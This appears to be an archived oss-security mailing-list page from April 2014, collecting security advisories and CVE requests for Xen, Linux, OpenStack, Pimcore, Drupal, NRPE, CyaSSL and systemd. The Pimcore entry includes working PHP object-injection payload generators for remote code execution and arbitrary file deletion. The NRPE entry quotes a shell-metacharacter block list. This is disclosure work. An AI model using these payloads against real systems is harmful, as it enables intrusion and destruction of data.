Xen.org security team | 23 Apr 17:13 2014

Xen Security Advisory 94 (CVE-2014-2986) - ARM hypervisor crash on guest interrupt controller access


              Xen Security Advisory CVE-2014-2986 / XSA-94
                             version 2

      ARM hypervisor crash on guest interrupt controller access

UPDATES IN VERSION 2
====================

This issue has been assigned CVE-2014-2986.

ISSUE DESCRIPTION
=================

When handling a guest access to the virtual GIC distributor (interrupt
controller) Xen could dereference a pointer before checking it for
validity leading to a hypervisor crash and host Denial of Service.

IMPACT
======

A buggy or malicious guest can crash the host.

VULNERABLE SYSTEMS
==================

Both 32- and 64-bit ARM systems are vulnerable from Xen 4.4 onward.

x86 systems are not vulnerable.

(Continue reading)

Xen.org security team | 23 Apr 12:20 2014

Xen Security Advisory 93 (CVE-2014-2915) - Hardware features unintentionally exposed to guests on ARM


             Xen Security Advisory CVE-2014-2915 / XSA-93
                              version 2

      Hardware features unintentionally exposed to guests on ARM

UPDATES IN VERSION 2
====================

This issue has been assigned CVE-2014-2915.

ISSUE DESCRIPTION
=================

When running on an ARM platform Xen was not correctly configuring the
hardware virtualisation platform and therefore did not prevent guests
from accessing various hardware features including cache control,
coprocessors, debug registers and various processor specific
registers.

IMPACT
======

By accessing these hardware facilities a malicious or buggy guest may
be able to cause various issues, including crashing the host, crashing
other guests (including control domains) and data corruption.

Privilege escalation is not thought to be possible but has not been
ruled out.

(Continue reading)

Andy Lutomirski | 22 Apr 23:37 2014
Picon

CVE-2014-0181: Linux network reconfiguration due to incorrect netlink checks

It is possible to reconfigure the network on Linux by calling write(2)
on an appropriately connected network socket.  By passing such a
socket as stdout or stderr to a setuid program, anyone can reconfigure
the network.

Eric Biederman sent patches to netdev containing a possible fix.

--

-- 
Andy Lutomirski
AMA Capital Management, LLC

Xen.org security team | 22 Apr 17:06 2014

Xen Security Advisory 93 - Hardware features unintentionally exposed to guests on ARM


                    Xen Security Advisory XSA-93

      Hardware features unintentionally exposed to guests on ARM

ISSUE DESCRIPTION
=================

When running on an ARM platform Xen was not correctly configuring the
hardware virtualisation platform and therefore did not prevent guests
from accessing various hardware features including cache control,
coprocessors, debug registers and various processor specific
registers.

IMPACT
======

By accessing these hardware facilities a malicious or buggy guest may
be able to cause various issues, including crashing the host, crashing
other guests (including control domains) and data corruption.

Privilege escalation is not thought to be possible but has not been
ruled out.

VULNERABLE SYSTEMS
==================

Both 32- and 64-bit ARM systems are vulnerable from Xen 4.4 onwards.

x86 systems are not vulnerable.
(Continue reading)

Tristan Cacqueray | 22 Apr 15:15 2014

[OSSA 2014-014] Neutron security groups bypass through invalid CIDR (CVE-2014-0187)

OpenStack Security Advisory: 2014-014
CVE: CVE-2014-0187
Date: April 22, 2014
Title: Neutron security groups bypass through invalid CIDR
Reporters: Stephen Ma (HP) and Christoph Thiel (Deutsche Telekom)
Products: Neutron
Versions: 2013.1 to 2013.2.3, and 2014.1

Description:
Stephen Ma from Hewlett Packard and Christoph Thiel from Deutsche
Telekom reported a vulnerability in Neutron security groups. By creating
a security group rule with an invalid CIDR, an authenticated user may
break openvswitch-agent process, preventing further rules from being
applied on the host. Note: removal of the faulty rule is not enough, the
openvswitch-agent must be restarted. All Neutron setups using Open
vSwitch are affected.

Juno (development branch) fix:
https://review.openstack.org/59212

Icehouse fix:
https://review.openstack.org/88674

Havana fix:
https://review.openstack.org/88057

Notes:
This fix will be included in the juno-1 development milestone and in
future 2013.2.4 and 2014.1.1 releases.

(Continue reading)

Pedro Ribeiro | 19 Apr 12:54 2014
Picon

CVE request: Fwd: Remote code execution in Pimcore CMS

Resending this as it hasn't been picked up most likely because of the lack of "CVE request" in the subject line.

Regards
Pedro

---------- Forwarded message ----------
From: "Pedro Ribeiro" <pedrib-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>
Date: 14 Apr 2014 10:16
Subject: Remote code execution in Pimcore CMS
To: <oss-security-ZwoEplunGu1jrUoiu81ncdBPR1lH4CV8@public.gmane.org>
Cc: "Bernhard Rusch" <Bernhard.Rusch-cs4as8ShrIbk7+2FdBfRIA@public.gmane.org>

Hi,

I have discovered a PHP object injection in Pimcore CMS.

Depending on the PHP version under which Pimcore is running, it is possible to achieve remote code execution in the worst case, and arbitrary file deletion at best.

Please find attached the report, which is also available at

https://github.com/pedrib/PoC/blob/master/pimcore-2.1.0.txt

Can you please provide a CVE number for this?

Thanks in advance.

Regards
Pedro

> Vulnerabilities in Pimcore 1.4.9 to 2.1.0 (inclusive)
> Discovered by Pedro Ribeiro (pedrib <at> gmail.com) of Agile Information Security

====================================================================
Vulnerability: Remote code execution in Pimcore CMS via unserialize() PHP object injection (CVE-HERE)
File(line): pimcore/lib/Pimcore/Tool/Newsletter.php(221)

Summary:
This vulnerability can be exploited by sending a base64 encoded payload as the "token" parameter to the
newsletter unsubscribe page of the target site. Payload [1] abuses several Zend classes to achieve
remote code execution (based on Stefan Esser's technique in [2] and Egidio Romano's exploit code from
[3]). Payload [4] abuses Zend_Http_Response_Stream to delete a file in /tmp/deleteme and works in all
PHP versions.

Versions affected:
1.4.9 to 1.4.10 (inclusive): Remote code execution (when server is running PHP <= 5.3.3). 
1.4.9 to 2.1.0 (inclusive): Arbitrary file deletion (any PHP version), POSSIBLY remote code execution.
Version 2.2.0 or higher resolves this vulnerability.

Due to changes introduced in PHP 5.3.4 to reject file names with null bytes, payload [3] does not work on
Pimcore versions between 2.0.1 and 2.1.0 as Pimcore enforces a PHP 5.4 requirement. Version 2.0.0 might
be vulnerable if anyone is running it on PHP versions <= 5.3.3... which according to the developers is not
possible, but the requirement was only enforced in 2.0.1.
Note that however the underlying vulnerability for both the remote code execution and the arbitrary file
deletion is the same (unserialize() object injection), so it might be possible to execute code if any
other Zend PHP POP chains are found in the future.

Fix for vulnerability:
https://github.com/pimcore/pimcore/commit/3cb2683e669b5644f180d362cfa9614c09bef280

Newsletter.php added to repository on February 25th 2013 (was released in 1.4.9 on 02/Mar/13):
https://github.com/pimcore/pimcore/commit/db18317af47de1de9f9ec6d83db1c2d353d06db7

PHP 5.4 requirement introduced on October 31st 2013 (was released in 2.0.1 on 20/Dec/13):
https://github.com/pimcore/pimcore/commit/ee56ac2c1f7c9dc6e1617023fc766ea9c67e601b

Code snippets:

pimcore/lib/Pimcore/Tool/Newsletter.php(221):

    public function getObjectByToken($token) {
        $data = unserialize(base64_decode($token));
        if($data) {
            if($object = Object_Abstract::getById($data["id"])) {

                if($version = $object->getLatestVersion()) {
                    $object = $version->getData();
                }

This function is called in the same file in confirm() and unsubscribeByToken():
    public function confirm($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

    public function unsubscribeByToken ($token) {

        $object = $this->getObjectByToken($token);
        if($object) {

In the Pimcore Wiki[5] and sample site[6], users are shown how to use the token parameter and encourage you
to take the sample code and modify it.
The sample code passes the token directly without any validation in confirmAction():
    public function confirmAction() {

        $this->enableLayout();

        $this->view->success = false;

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used
for your class above (mailing list)

        if($newsletter->confirm($this->getParam("token"))) {
            $this->view->success = true;
        }

And also in unsubscribeAction():
    public function unsubscribeAction() {

        $this->enableLayout();

        $newsletter = new Pimcore_Tool_Newsletter("person"); // replace "crm" with the class name you have used
for your class above (mailing list)

        $unsubscribeMethod = null;
        $success = false;

        if($this->getParam("email")) {
            $unsubscribeMethod = "email";
            $success = $newsletter->unsubscribeByEmail($this->getParam("email"));
        }

        if($this->getParam("token")) {
            $unsubscribeMethod = "token";
            $success = $newsletter->unsubscribeByToken($this->getParam("token"));
        }

Mitigation:
Do not pass untrusted input into the unserialize function. Use JSON encoding / decoding instead of
unserialize. This was introduced in commit 3cb2683e669 and released in version 2.2.0.

References:
========================================================
[1] Remote code execution, PHP <= 5.3.3, original code from [3] (Egidio Romano)
<?php

class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '<?php phpinfo(); die;?>';
}

class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;

    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}

interface Zend_Pdf_ElementFactory_Interface {}

class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
    protected $_docCount = 1;
    protected $_name = 'foo';
    protected $_directory;
    protected $_fields;
    protected $_files;

    public function __construct($directory, $fields)
    {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}    

class Zend_Pdf_ElementFactory_Proxy
{
    private $_factory;

    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
    {
        $this->_factory = $factory;
    }
}

// This null byte technique only works in PHP <= 5.3.3
$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/malicious.php\0");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);

echo base64_encode(serialize($____proxy));

?>

========================================================
[2] http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf
[3] http://www.exploit-db.com/exploits/19573
========================================================
[4] Arbitrary file deletion, all PHP versions
<?php
class Zend_Http_Response_Stream 
{
    protected $stream;
    protected $stream_name;
    protected $_cleanup;
    public function setStream($stream)
    {
        $this->stream = $stream;
        return $this;
    }
    public function setCleanup($cleanup = true) {
        $this->_cleanup = $cleanup;
    }
    public function setStreamName($stream_name) {
        $this->stream_name = $stream_name;
        return $this;
    }
}
$resp = new Zend_Http_Response_Stream();
$resp->setStream(null);
$resp->setCleanup();
$resp->setStreamName("/tmp/deleteme");

echo base64_encode(serialize($resp));
?>

========================================================
[5] http://www.pimcore.org/wiki/display/PIMCORE/Newsletter
[6] Downloadable from the Pimcore website (https://www.pimcore.org/download/pimcore-data.zip).
The file mentioned is website/controllers/NewsletterController.php.

Other references:
https://www.owasp.org/index.php/PHP_Object_Injection
http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/
http://vagosec.org/2013/12/wordpress-rce-exploit/
Matthew Daley | 19 Apr 02:51 2014

CVE request / advisory: gdomap (GNUstep core package <= 1.24.6)

Hi,

I'd like to request a CVE ID for this issue. It was found in software
from GNUstep (www.gnustep.org), which develop an open-source
development framework and runtime for client and server applications.

This is the first such request and the issue is (now) public; this
message serves as an advisory as well.

Affected software: gdomap (GNUstep Distributed Objects nameserver)
Description: After receiving a crafted invalid request, gdomap will
attempt to log an error message to the system logger. However, due to
incorrect setup of the logger during server initialization, the logger
and gdomap itself will mess up program state enough that program
execution will be aborted. gdomap listens to all interfaces, allowing
a remote unauthenticated attacker to DOS the nameserver. (Please see
the bug tracker entry for more detailed information.)
Bug tracker: https://savannah.gnu.org/bugs/?41751
Affected versions: current releases (GNUstep core package <= 1.24.6)
Fix: http://svn.gna.org/viewcvs/gnustep/libs/base/trunk/Tools/gdomap.c?r1=37756&r2=37755&pathrev=37756
Release notes: http://svn.gna.org/viewcvs/gnustep/libs/base/trunk/ChangeLog?r1=37756&r2=37755&pathrev=37756
Reported by: Matthew Daley

Please let me know if you need any further information.

Thanks,

- Matthew Daley

Forest Monsen | 18 Apr 19:40 2014
Picon

CVE Request for Drupal Core

Hi there,

Please issue a CVE identifier for:

SA-CORE-2014-002 - Drupal core - Information Disclosure
https://drupal.org/SA-CORE-2014-002

Thanks!

Best,
Forest
Eduardo Tongson | 18 Apr 04:14 2014
Picon

CVE Request: Nagios Remote Plugin Executor <= 2.15 Remote Command Execution

Details: http://seclists.org/fulldisclosure/2014/Apr/240
This is similar to CVE-2013-1362

Is there a CVE already assigned for this issue?

Fix:

--- nrpe/src/nrpe.c
+++ nrpe/src/nrpe.c
 <at>  <at>  -42,7 +42,7  <at>  <at>  int use_ssl=FALSE;

 #define DEFAULT_COMMAND_TIMEOUT    60            /* default timeout
for execution of plugins */
 #define MAXFD                   64
-#define NASTY_METACHARS         "|`&><'\"\\[]{};"
+#define NASTY_METACHARS         "|`&><'\"\\[]{};\n"

 char    *command_name=NULL;
 char    *macro_argv[MAX_COMMAND_ARGUMENTS];

Raphael Geissert | 17 Apr 14:13 2014
Picon

CVE ids for CyaSSL 2.9.4?

Hi,

[CC'ing Ivan Fratric and one of the many  <at> wolfssl addresses I found]

CyaSSL 2.9.4 fixes a number of security issues.

From [3]:
> Issue #1 (Memory  Corruption)
> Issue #2 (Out of bounds read)
> Issue #3 (Dangerous Default Behavior, out of bounds read)
> Issue #4 (NULL pointer dereference)
> Issue #5 (Unknown Critical Certificate Extension Allowed)

Have CVE ids been assigned already? if not, could they be assigned?

Thanks in advance.

References:
[0]http://www.wolfssl.com/yaSSL/Docs-cyassl-changelog.html
[1]http://www.yassl.com/forums/topic539-cyassl-294-released.html
[2]http://www.yassl.com/yaSSL/Blog/Entries/2014/4/9_CyaSSL_2.9.4_Released.html
[3]http://www.yassl.com/yaSSL/Blog/Entries/2014/4/11_wolfSSL_Security_Advisory__April_9%2C_2014.html

Cheers,
--

-- 
Raphael Geissert - Debian Developer
www.debian.org - get.debian.net

Marc Deslauriers | 17 Apr 13:39 2014

CVE Request: systemd stack-based buffer overflow in systemd-ask-password

Hello,

From the Red Hat bug:
A stack-based buffer overflow was found in systemd-ask-password, a utility used
to query a system password or passphrase from the user, using a question message
specified on the command line. A local user could this flaw to crash the binary
or even execute arbitrary code with the permissions of the user running the program.

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1084286

Fix:
http://cgit.freedesktop.org/systemd/systemd/commit/?id=036eeac5a1799fa2c0ae11a14d8c667b5d303189

Could a CVE please be assigned to this issue?

Thanks,

Marc.

--

-- 
Marc Deslauriers
Ubuntu Security Engineer     | http://www.ubuntu.com/
Canonical Ltd.               | http://www.canonical.com/


Gmane